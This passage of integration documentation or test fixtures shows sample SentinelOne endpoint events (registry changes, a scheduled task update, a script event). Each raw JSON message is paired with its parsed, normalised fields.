1744, - "start": "2021-09-07T13:40:21.170000Z", - "title": "Host Process for Windows Services", - "working_directory": "C:\\WINDOWS\\System32" - }, - "pid": 9876, - "start": "2021-09-14T15:51:43.718000Z", - "title": "Windows Problem Reporting", - "working_directory": "C:\\WINDOWS\\System32" - }, - "related": { - "hash": [ - "010db07461e45b41c886192df6fd425ba8d42d82", - "1c09759dcd31fdc81bcd6685438d7efb34e0229f1096bfd57d41ecfe614d07dc", - "573ad9af63a6a0ab9b209ece518fd582b54cfef5", - "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "f586835082f632dc8d9404d83bc16316", - "f7991343cf02ed92cb59f394e8b89f1f" - ], - "user": [ - "AUTORITE NT\\Syst\u00e8me" - ] - }, - "user": { - "id": "S-1-5-18", - "name": "AUTORITE NT\\Syst\u00e8me" - } - } - - ``` - - -=== "reg_key_security_changed.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 10, \"uuid\": \"bfd21e8929fd49768299fae02a0557a6\", \"traceId\": \"7892FB424053407899299D5319FEB9C5\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH19\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631785108303\"}, \"event_type\": \"regKeySecurityChanged\", \"trueContext\": {\"key\": {\"value\": \"D1A7307582B51DFF\"}}, \"regKey\": {\"key\": {}, \"path\": \"MACHINE\\\\BCD00000000\\\\Objects\\\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\\\Elements\\\\11000001\"}, \"securityInformation\": 4, \"source\": {\"node\": {\"key\": {\"value\": \"C02A3567256C6DE9\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"61D0DBC75EA434C4\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\system32\\\\taskhostw.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"97096\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"taskhostw.exe\", \"fullPid\": {\"pid\": 25104, \"startTime\": {\"millisecondsSinceEpoch\": \"1631775524677\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6186\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"7A33A49AFDF1C571\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Tasks\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 15, \"integrityLevel\": \"HIGH\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"D1A7307582B51DFF\"}}, \"counters\": {\"moduleLoad\": 52}}}", - "event": { - "action": "regKeySecurityChanged", - "start": "2021-09-16T09:38:28.303000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 10, - "trace_id": "7892FB424053407899299D5319FEB9C5", - "uuid": "bfd21e8929fd49768299fae02a0557a6" - }, - "event": { - "type": "regKeySecurityChanged" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "module_load": 52 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\system32\\taskhostw.exe", - "node": { - "key": "61D0DBC75EA434C4" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "97096", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "C02A3567256C6DE9" - }, - "parent": { - "node": { - "key": "7A33A49AFDF1C571" - } - }, - "root": "E_FALSE", - "session_id": 15, - "true_context": { - "key": "D1A7307582B51DFF" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6186" - } - }, - "registry": { - "security_information": 4 - }, - "true_context": { - "key": "D1A7307582B51DFF" - } - }, - "host": { - "name": "LAPTOP-TECH19", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "taskhostw.exe", - "executable": "C:\\Windows\\system32\\taskhostw.exe", - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - }, - "name": "taskhostw.exe", - "pid": 25104, - "start": "2021-09-16T06:58:44.677000Z", - "title": "Host Process for Windows Tasks", - "working_directory": "C:\\Windows\\system32" - }, - "registry": { - "path": "MACHINE\\BCD00000000\\Objects\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\Elements\\11000001", - "value": "11000001" - }, - "related": { - "hash": [ - "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "564e4806ab18f93b93d551cd10c1598e", - "fed4b4a753a9541389aa670c69e624be07569ccd" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6186", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "reg_value_create.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 10, \"uuid\": \"bfd21e8929fd49768299fae02a0557a6\", \"traceId\": \"7892FB424053407899299D5319FEB9C5\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH19\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631785108304\"}, \"event_type\": \"regValueCreate\", \"trueContext\": {\"key\": {\"value\": \"D1A7307582B51DFF\"}}, \"regValue\": {\"key\": {}, \"path\": \"MACHINE\\\\BCD00000000\\\\Objects\\\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\\\Elements\\\\12000002\\\\Element\"}, \"valueType\": 1, \"source\": {\"node\": {\"key\": {\"value\": \"C02A3567256C6DE9\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"61D0DBC75EA434C4\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\system32\\\\taskhostw.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"97096\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"fed4b4a753a9541389aa670c69e624be07569ccd\", \"sha256\": \"0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad\", \"md5\": \"564e4806ab18f93b93d551cd10c1598e\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"taskhostw.exe\", \"fullPid\": {\"pid\": 25104, \"startTime\": {\"millisecondsSinceEpoch\": \"1631775524677\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6186\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"7A33A49AFDF1C571\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Tasks\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 15, \"integrityLevel\": \"HIGH\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"D1A7307582B51DFF\"}}, \"counters\": {\"moduleLoad\": 52}}}", - "event": { - "action": "regValueCreate", - "start": "2021-09-16T09:38:28.304000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 10, - "trace_id": "7892FB424053407899299D5319FEB9C5", - "uuid": "bfd21e8929fd49768299fae02a0557a6" - }, - "event": { - "type": "regValueCreate" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "module_load": 52 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\system32\\taskhostw.exe", - "node": { - "key": "61D0DBC75EA434C4" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "97096", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "HIGH", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "C02A3567256C6DE9" - }, - "parent": { - "node": { - "key": "7A33A49AFDF1C571" - } - }, - "root": "E_FALSE", - "session_id": 15, - "true_context": { - "key": "D1A7307582B51DFF" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6186" - } - }, - "registry": { - "value_type": "1" - }, - "true_context": { - "key": "D1A7307582B51DFF" - } - }, - "host": { - "name": "LAPTOP-TECH19", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "taskhostw.exe", - "executable": "C:\\Windows\\system32\\taskhostw.exe", - "hash": { - "md5": "564e4806ab18f93b93d551cd10c1598e", - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad" - }, - "name": "taskhostw.exe", - "pid": 25104, - "start": "2021-09-16T06:58:44.677000Z", - "title": "Host Process for Windows Tasks", - "working_directory": "C:\\Windows\\system32" - }, - "registry": { - "data": { - "type": "REG_SZ" - }, - "path": "MACHINE\\BCD00000000\\Objects\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\Elements\\12000002\\Element", - "value": "Element" - }, - "related": { - "hash": [ - "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "564e4806ab18f93b93d551cd10c1598e", - "fed4b4a753a9541389aa670c69e624be07569ccd" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6186", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "reg_value_delete.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 43, \"uuid\": \"19f22913365942f2afeed1463c96104b\", \"traceId\": \"63014A4A2D8B42148CBD53DA4C5937A8\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM11\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631785105794\"}, \"event_type\": \"regValueDelete\", \"trueContext\": {\"key\": {\"value\": \"6508114A467ECCA8\"}}, \"regValue\": {\"key\": {}, \"path\": \"MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Services\\\\SentinelDeviceControl\\\\Enum\\\\53\"}, \"source\": {\"node\": {\"key\": {\"value\": \"1BA4624EB033A7CC\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"AC786EF3445E33CE\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\System32\\\\ntoskrnl.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"10848576\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"560b6a3b55112d9834e28def41d5ac3de0e03928\"}}, \"fullPid\": {\"pid\": 4, \"startTime\": {\"millisecondsSinceEpoch\": \"1631781067519\"}}, \"user\": {\"name\": \"SYSTEM\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"1BA4624EB033A7CC\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"NT Kernel & System\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6508114A467ECCA8\"}}, \"counters\": {\"modelChildProcess\": 2, \"osChildProcess\": 2, \"fileModification\": 1, \"netConnIn\": 16, \"netConnOut\": 26}}}", - "event": { - "action": "regValueDelete", - "start": "2021-09-16T09:38:25.794000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 43, - "trace_id": "63014A4A2D8B42148CBD53DA4C5937A8", - "uuid": "19f22913365942f2afeed1463c96104b" - }, - "event": { - "type": "regValueDelete" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "file_modification": 1, - "model_child_process": 2, - "net_conn_out": 26, - "os_child_process": 2 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\ntoskrnl.exe", - "node": { - "key": "AC786EF3445E33CE" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "10848576", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "1BA4624EB033A7CC" - }, - "parent": { - "node": { - "key": "1BA4624EB033A7CC" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "6508114A467ECCA8" - } - }, - "true_context": { - "key": "6508114A467ECCA8" - } - }, - "host": { - "name": "LAPTOP-COM11", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "executable": "C:\\Windows\\System32\\ntoskrnl.exe", - "hash": { - "sha1": "560b6a3b55112d9834e28def41d5ac3de0e03928" - }, - "name": "ntoskrnl.exe", - "pid": 4, - "start": "2021-09-16T08:31:07.519000Z", - "title": "NT Kernel & System", - "working_directory": "C:\\Windows\\System32" - }, - "registry": { - "path": "MACHINE\\SYSTEM\\ControlSet001\\Services\\SentinelDeviceControl\\Enum\\53", - "value": "53" - }, - "related": { - "hash": [ - "560b6a3b55112d9834e28def41d5ac3de0e03928" - ], - "user": [ - "SYSTEM" - ] - }, - "user": { - "name": "SYSTEM" - } - } - - ``` - - -=== "reg_value_modified.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 133, \"uuid\": \"4d311e18709146cba8797a22e3c20762\", \"traceId\": \"8D9114CB762D473FAA5189BD13762FB2\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM13\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631785156204\"}, \"event_type\": \"regValueModified\", \"trueContext\": {\"key\": {\"value\": \"B3E0EF7ECFD0D296\"}}, \"regValue\": {\"key\": {}, \"path\": \"MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4d36e96c-e325-11ce-bfc1-08002be10318}\\\\0003\\\\GlobalSettings\\\\AnalogDigitalCapture\\\\Node000\\\\Chan001\"}, \"oldValueType\": 1, \"newValueType\": 3, \"source\": {\"node\": {\"key\": {\"value\": \"645A938883C36D21\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"294CA423F5D3A1E5\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\Windows\\\\System32\\\\svchost.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"57360\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS PUBLISHER\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"010db07461e45b41c886192df6fd425ba8d42d82\", \"sha256\": \"643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7\", \"md5\": \"f586835082f632dc8d9404d83bc16316\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\Windows\\\\System32\\\\svchost.exe -k LocalServiceNetworkRestricted -p\", \"fullPid\": {\"pid\": 3504, \"startTime\": {\"millisecondsSinceEpoch\": \"1631625850355\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\SERVICE LOCAL\", \"sid\": \"S-1-5-19\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"DEF87C2AB48B84DC\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Host Process for Windows Services\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"B3E0EF7ECFD0D296\"}}, \"counters\": {\"modelChildProcess\": 25, \"osChildProcess\": 25, \"moduleLoad\": 87}}, \"oldValueData\": \"00C0F0FF\", \"newValueData\": \"0040EEFF\"}", - "event": { - "action": "regValueModified", - "start": "2021-09-16T09:39:16.204000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 133, - "trace_id": "8D9114CB762D473FAA5189BD13762FB2", - "uuid": "4d311e18709146cba8797a22e3c20762" - }, - "event": { - "type": "regValueModified" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "model_child_process": 25, - "module_load": 87, - "os_child_process": 25 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Windows\\System32\\svchost.exe", - "node": { - "key": "294CA423F5D3A1E5" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER" - } - }, - "size_bytes": "57360", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "645A938883C36D21" - }, - "parent": { - "node": { - "key": "DEF87C2AB48B84DC" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "B3E0EF7ECFD0D296" - }, - "user": { - "sid": "S-1-5-19" - } - }, - "registry": { - "new": { - "value_type": "3" - }, - "old": { - "data": { - "strings": [ - "00C0F0FF" - ], - "type": "REG_SZ" - }, - "value_type": "1" - } - }, - "true_context": { - "key": "B3E0EF7ECFD0D296" - } - }, - "host": { - "name": "LAPTOP-COM13", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p", - "executable": "C:\\Windows\\System32\\svchost.exe", - "hash": { - "md5": "f586835082f632dc8d9404d83bc16316", - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7" - }, - "name": "svchost.exe", - "pid": 3504, - "start": "2021-09-14T13:24:10.355000Z", - "title": "Host Process for Windows Services", - "working_directory": "C:\\Windows\\System32" - }, - "registry": { - "data": { - "bytes": "0040EEFF", - "type": "REG_BINARY" - }, - "path": "MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e96c-e325-11ce-bfc1-08002be10318}\\0003\\GlobalSettings\\AnalogDigitalCapture\\Node000\\Chan001", - "value": "Chan001" - }, - "related": { - "hash": [ - "010db07461e45b41c886192df6fd425ba8d42d82", - "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "f586835082f632dc8d9404d83bc16316" - ], - "user": [ - "AUTORITE NT\\SERVICE LOCAL" - ] - }, - "user": { - "id": "S-1-5-19", - "name": "AUTORITE NT\\SERVICE LOCAL" - } - } - - ``` - - -=== "sched_task_update.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 63, \"uuid\": \"bcc4bf7a284441599707050e1d58a8dd\", \"traceId\": \"CEBBC94D38B041B1B2DE01C315EB28F5\", \"agentVersion\": \"S1-WIN/21.5.7.370\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH15\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631634708620\"}, \"event_type\": \"schedTaskUpdate\", \"trueContext\": {\"key\": {\"value\": \"4FE2F2ADB5655DDF\"}}, \"taskName\": \"\\\\Microsoft\\\\Windows\\\\UpdateOrchestrator\\\\Schedule Maintenance Work\", \"source\": {\"node\": {\"key\": {\"value\": \"38F2355042BA2367\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"99892497510C239E\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\WINDOWS\\\\system32\\\\MoUsoCoreWorker.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"1614848\", \"signature\": {\"signed\": {\"identity\": \"MICROSOFT WINDOWS\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a5a6716e38b06d44f4803b5167db2a0862b1d6bf\", \"sha256\": \"a250e2af9b662d6a81552178ac7514e81032c5a4b7031666f8e777f597ea5a9d\", \"md5\": \"475c5e07f8375dab6e5888301b1705e6\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"C:\\\\Windows\\\\System32\\\\mousocoreworker.exe -Embedding\", \"fullPid\": {\"pid\": 8588, \"startTime\": {\"millisecondsSinceEpoch\": \"1631289768083\"}}, \"user\": {\"name\": \"AUTORITE NT\\\\Syst\\u00e8me\", \"sid\": \"S-1-5-18\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"B485A24CFF4A8D31\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"MoUSO Core Worker Process\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"integrityLevel\": \"SYSTEM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"4FE2F2ADB5655DDF\"}}, \"counters\": {\"modelChildProcess\": 1, \"osChildProcess\": 1, \"moduleLoad\": 1158, \"netConnOut\": 7, \"dnsLookups\": 1}}}", - "event": { - "action": "schedTaskUpdate", - "start": "2021-09-14T15:51:48.620000Z" - }, - "agent": { - "version": "S1-WIN/21.5.7.370" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "seq_id": 63, - "trace_id": "CEBBC94D38B041B1B2DE01C315EB28F5", - "uuid": "bcc4bf7a284441599707050e1d58a8dd" - }, - "event": { - "type": "schedTaskUpdate" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "process": { - "counters": { - "dns_lookups": 1, - "model_child_process": 1, - "module_load": 1158, - "net_conn_out": 7, - "os_child_process": 1 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\WINDOWS\\system32\\MoUsoCoreWorker.exe", - "node": { - "key": "99892497510C239E" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS" - } - }, - "size_bytes": "1614848", - "start": "18446732429235951616" - }, - "family": "SYS_WIN32", - "integrity_level": "SYSTEM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "38F2355042BA2367" - }, - "parent": { - "node": { - "key": "B485A24CFF4A8D31" - } - }, - "root": "E_TRUE", - "true_context": { - "key": "4FE2F2ADB5655DDF" - }, - "user": { - "sid": "S-1-5-18" - } - }, - "scheduled_task": { - "name": "\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Maintenance Work" - }, - "true_context": { - "key": "4FE2F2ADB5655DDF" - } - }, - "host": { - "name": "LAPTOP-TECH15", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "C:\\Windows\\System32\\mousocoreworker.exe -Embedding", - "executable": "C:\\WINDOWS\\system32\\MoUsoCoreWorker.exe", - "hash": { - "md5": "475c5e07f8375dab6e5888301b1705e6", - "sha1": "a5a6716e38b06d44f4803b5167db2a0862b1d6bf", - "sha256": "a250e2af9b662d6a81552178ac7514e81032c5a4b7031666f8e777f597ea5a9d" - }, - "name": "MoUsoCoreWorker.exe", - "pid": 8588, - "start": "2021-09-10T16:02:48.083000Z", - "title": "MoUSO Core Worker Process", - "working_directory": "C:\\WINDOWS\\system32" - }, - "related": { - "hash": [ - "475c5e07f8375dab6e5888301b1705e6", - "a250e2af9b662d6a81552178ac7514e81032c5a4b7031666f8e777f597ea5a9d", - "a5a6716e38b06d44f4803b5167db2a0862b1d6bf" - ], - "user": [ - "AUTORITE NT\\Syst\u00e8me" - ] - }, - "user": { - "id": "S-1-5-18", - "name": "AUTORITE NT\\Syst\u00e8me" - } - } - - ``` - - -=== "script.json" - - ```json - - { - "message": "{\"meta\": {\"uuid\": \"f63008e522ce40c9afd4348634b5ab3b\", \"traceId\": \"01FFQFVBJWAT35E5D075MQ1408\", \"agentVersion\": \"S1-WIN/21.7.1.240\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH20\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631802162798\"}, \"event_type\": \"scripts\", \"source\": {\"node\": {\"key\": {\"value\": \"35A565744E7A266A\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"FBFFF74AA755328C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"18446732429235951616\"}, \"path\": \"C:\\\\ProgramData\\\\PCDr\\\\CSAW\\\\CSAW_Child.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"5518152\", \"signature\": {\"signed\": {\"identity\": \"PC-DOCTOR, INC.\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d\", \"sha256\": \"e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa\", \"md5\": \"423050654da76dab9c2866ba3c13ce38\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\ProgramData\\\\PCDr\\\\CSAW\\\\CSAW_Child.exe\\\" /child\", \"fullPid\": {\"pid\": 14832, \"startTime\": {\"millisecondsSinceEpoch\": \"1631802162671\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"04DEDAAF23E16398\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"DED9F9357E5C5C30\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1631802160011\"}, \"path\": \"C:\\\\Users\\\\user.name.CORP\\\\AppData\\\\Roaming\\\\PCDr\\\\Update\\\\Binaries\\\\CSAW.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"5518152\", \"signature\": {\"signed\": {\"identity\": \"PC-DOCTOR, INC.\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"bb900fd4da5c72e3bb2c977dbbe2e3c02e1c387d\", \"sha256\": \"e5626a87403b5efbc0c1873059eeacd9ead8b046dcc7da32fbb4e87e9a5e8dfa\", \"md5\": \"423050654da76dab9c2866ba3c13ce38\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Users\\\\user.name.CORP\\\\AppData\\\\Roaming\\\\PCDr\\\\Update\\\\Binaries\\\\CSAW.exe\\\" /NA /noui\", \"fullPid\": {\"pid\": 1780, \"startTime\": {\"millisecondsSinceEpoch\": \"1631802161886\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"EDA8D6AB348AAE7D\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \" \", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"HIGH\", \"isWow64\": \"E_TRUE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B21DD2505AAA5F2\"}}, \"counters\": 